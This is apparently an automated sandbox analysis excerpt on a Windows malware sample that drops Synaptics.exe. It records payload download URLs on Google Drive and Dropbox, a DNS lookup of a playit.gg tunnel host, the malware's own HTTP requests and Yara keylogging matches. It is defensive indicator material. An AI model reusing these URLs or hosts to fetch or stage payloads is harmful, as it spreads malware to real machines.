            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
            Source: Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeF
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
            Source: Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgh
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
            Source: Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpv
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpx
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.be
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtoN
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
            Source: Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzC
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzQ
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~S
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp, WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp, WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
            Source: unknown | DNS traffic detected: queries for: agonizing-bat.auto.playit.gg
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00474D50 InternetOpenA, InternetOpenUrlA, InternetReadFile, InternetCloseHandle, 4_2_00474D50
            Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                User-Agent: Synaptics.exe
                Host: docs.google.com
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                User-Agent: MyApp
                Host: freedns.afraid.org
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                Content-Security-Policy: script-src 'nonce-h8PmNUY3Lxp2hZQHX+d9yQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                Date: Wed, 26 Jan 2022 01:40:42 GMT
                Expires: Wed, 26 Jan 2022 01:40:42 GMT
                Cache-Control: private, max-age=0
                X-Content-Type-Options: nosniff
                X-Frame-Options: SAMEORIGIN
                X-XSS-Protection: 1; mode=block
                Server: GSE
                Set-Cookie: NID=511=SSVn4-j59JXsTzxw847lfqJIID7zKof-Xkcxy3fnYPbOQF2K_rhItUDKpUam4CimsZa0ZkCNsNF-p5jihI9D9v5_JpNDmEeXc8nvpPuWdC1Y-5-xdpfIrOe7Xgo8_7k6NVyKXkeYW_T_LgorYz9SrXu0RFiFNl_tuUgPHfJZcdM; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnly
                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                Accept-Ranges: none
                Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                Connection: close
                Transfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-MnbeCR+DLosHit1O26Q8ng' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=Z9NzJjnPWUitQLAoJHeuMMuo7U2KlbjEgRTwO6DBDzKkE9bNbTk7QrgaCNMw7qYQFNh3y6NAHppTjvVahiaNwwztWY1HVVfW-N_CaP8ut_6I2UiEdontaeBHy3IXTvLOy8WJyEVXH-OcRIRxCituWMrRoGdSseIThKXC76zDRX8; expires=Thu, 28-Jul-2022 01:40:41 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-YXDM5qvdo8b2sWEK1L9uVw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=ItB4rggOjE7L83nmMdJfyQhAXU45o48wqAdRB-lL5Ie-MdQjOv3okMid3WbfMDZHbnDZr5k9aqXXvSn4CBTAwHSyCdMEU1QFmYWvxj_Bxyqo2--MwRLKKn67BRFBYD59EXcasAatKWIUcsJscCR7xpunrw5_i7il4Vlwvg1bm0Y; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-qUQ/asTtDE7He0Vml9HmZA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=GsvAX0t__-cMfTHedu1r9_YWhq8dTNOVby6k30MueLAVtOkLaQZHzdz00YyNq18rbdjPdyc0Y4iU6Kprz94a8dWdD6HYvujbvGXtTMbrJ3VWJ8_KcKALdwMx3u4pWl4yDWktspyOAhFbeHv2Cp3cvEGHz7ybCheljHi7wIYyQiw; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-RzI2vKOO/RcM9o2uC+wZFw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=oHsspnoaoRPvcVOBycmUhuol6EoOLvfMWKH14ADwtMfMkSbpD4McXBo-NIiw6WK2tPXLjhAxXrYi2j5Wwdpvid_dF8gzqeWxh1UK7pTsTjP_eApiv0c3T4yzPwYAKv1vSBfh3DOcMmuNNBAVV__pNTcD74huBhRy_r2KZ3mXhAA; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-3MXOmncPcJvKr/WLBVs8Mw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:42 GMTExpires: Wed, 26 Jan 2022 01:40:42 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=mjLYExoCbbzoBBUNtGENtY1M0qKSlrmcXoYIJs_CCALnZCIBOqRp-6QCq8BTRpdonT8b51hpbQiifNkp-lDolBQYDmXkMflxAtOsGTOCzEEwcE_m_YCznKVQUDPJwzWP67jsK7TbGuvkjGhB4aiIzcwX0QCU0QfLneZL1N-82lk; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Content-Security-Policy: script-src 'nonce-ftrJSB7t2WqD3Wc0doJpzQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=tgTMfZ7NTv3R_IbrSihjBb2kk2KK_CmJAfjV8L7E1gj4Y4KyElEhEF7auzo5NNAF14Er8xmdQUjR1JrqDdruxUCOf144megLwLiTcIrUnMGZ3M5zqxV_TbzDZP_KcKlSmjUpwVMXYOVgPbfDy-mE52xpmx5XYc-gW0fNu7Lj6xE; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Content-Security-Policy: script-src 'nonce-g3DFDAYiVjvuKejFhieIhA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=XWSM1KThS4sUsrpzKBe-UXkKfBYAOV_V-pBG4TKFtlwNETSmBsNYLPwdIwLP0C-cxljhicCjVhOhPmGHGngvqmlM2xSVvWyVCpJQp2pHYXPcOD30RrXp7d7_kmx8iB9z6zkwLZ1gA4C9LvCNMS4ZvE6vwxPFj2YLPWJWrLwBtuU; expires=Thu, 28-Jul-2022 01:40:42 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-UDhg3Ol/vxNIFYfR64ajjw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=orlJ0NdqZKBuJgdBAEhrpiJB9dinWrdefjKHLXO8dDrwrs2Gl1KvH5O7_-hmsGmBPar5jEJIZpwkTCp2aADXUJ0v22jDK2OpqNdmc3PhtYeUGrfIsg6cJvKc8XJd9d_le0i0QmiTXebU0Dlow0IYxVePmxM_0xdnuzLXfA_AGj0; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}Content-Security-Policy: script-src 'nonce-nGVV6uaGbC+cgXeCHrTnSA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"Date: Wed, 26 Jan 2022 01:40:43 GMTExpires: Wed, 26 Jan 2022 01:40:43 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=VdtJ7dEWxYuwyj39zjdCItptsaZ6X41Pt1W2YzyShAKVYzCo0n_VAjG3Kn-q7l3N32RNwv0zA2ey7csKpdnOYEPwRG8aljEu-tCTLhtS6O7TKkJJn4tmHfofq494iuEnE3vtL1knh7Pf5mhXt5w5tA2uLL2slaN9xSnjd-w54RM; expires=Thu, 28-Jul-2022 01:40:43 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
            Source: Synaptics.exe, 00000014.00000000.447541518.00000000079D4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleadapis.com*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)
            Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49766 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49765 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            Source: Yara match | File source: Process Memory Space: y8kdmHi6x3.exe PID: 5268, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: y8kdmHi6x3.exe PID: 4844, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: ._cache_y8kdmHi6x3.exe PID: 6232, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: SYSTEM32.EXE PID: 6952, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 6964, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: Synaptics.exe PID: 4928, type: MEMORYSTR
